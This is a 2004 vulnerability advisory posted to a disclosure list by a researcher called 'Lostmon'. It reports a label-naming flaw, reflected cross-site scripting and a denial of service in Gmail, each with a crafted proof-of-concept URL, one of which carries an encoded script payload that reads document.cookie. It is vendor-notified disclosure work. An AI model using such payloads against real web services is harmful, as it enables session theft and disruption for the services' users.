lostmonGmail.txt

`Date: Sat, 20 Nov 2004 03:37:04 +0100  
From: Lostmon <[email protected]>  
Subject: multiples vulnerabilities in gmail service (XSS, Denial of Service,)  
  
  
  
#######################################  
Denial of service On gmail account  
vendor url: http://gmail.google.com/  
vendor notified:yes exploit included :yes  
original advisore:http://lostmon.spymac.net/blog/  
########################################  
  
wen a user have active the Gmail´s cookie a user can create a special URL to  
Gmail service have these two vulnerabilities :  
  
1- change a name of button of "remove label" and can create a Ghost categorie.  
  
http://gmail.google.com/gmail?search=cat&cat=[label_name]&view=tl&start=0&zx=18acabd2  
b173f0d81040559556&fs=1  
  
2 .variable xz no validate properly the imput and can permit execute XSS code   
  
  
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f  
0d81040559556[XSS-code]&fs=1  
  
3.Denial of service fs variable not count how many times is in url and ,,,,  
  
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f  
0d81040559556&fs=%3Cscript%3Ealert(  
document.cookie)%3C%2Fscript%3E&fs=1  
  
or   
  
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f  
0d81040559556&fs=%3Cscript%3Ealert(  
document.cookie)%3C%2Fscript%3E&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs  
=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&  
fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1  
  
nice :)  
  
atentamente:  
  
Lostmon  
  
  
thnx to http://www.ayuda-internet.net for their support   
Thnx to Rottew and ismax  
Thx to estrella to be my ligth   
  
La curiosidad es lo que hace mover la mente....  
  
  
`